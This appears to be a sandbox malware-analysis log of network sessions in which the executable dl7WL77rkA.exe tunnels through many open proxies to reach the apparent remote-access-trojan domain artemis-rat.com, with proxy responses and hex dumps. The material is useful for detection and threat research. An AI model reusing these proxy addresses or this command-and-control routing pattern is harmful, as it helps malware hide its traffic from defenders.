                                                                                                                                                                                                                                                            589192.168.2.551696147.75.34.86100003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972742081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.278858900 CET356INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: Zscaler/6.3
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            590192.168.2.55167558.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972806931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            591192.168.2.55165131.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.973215103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            592192.168.2.551713221.153.92.39803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.973474979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.275407076 CET310INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            593192.168.2.551726163.172.153.194163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.973556042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.701689005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811306953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939429998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202178955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.316056967 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            594192.168.2.5517163.73.120.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.973666906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.701682091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905102968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:14.355638027 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.362327099 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.594329119 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.738430023 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:36.770503998 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:01.859909058 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            595192.168.2.551734121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.974186897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            596192.168.2.55172037.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.975604057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            597192.168.2.55165345.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.976356983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            598192.168.2.55176215.236.106.23631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.976577044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.273684025 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            599192.168.2.5517308.142.132.204180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.976578951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.297791958 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            600192.168.2.55161338.54.116.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.976686954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.391036034 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            601192.168.2.551704134.209.105.20931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.976891994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.318137884 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            602192.168.2.551783190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.977231026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            603192.168.2.55070837.187.91.192278983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.977233887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093039989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202441931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202186108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.201822042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            604192.168.2.55072962.171.131.101258473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.977339983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.107947111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124728918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217715979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            605192.168.2.55174779.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.978063107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            606192.168.2.551188107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.978271961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
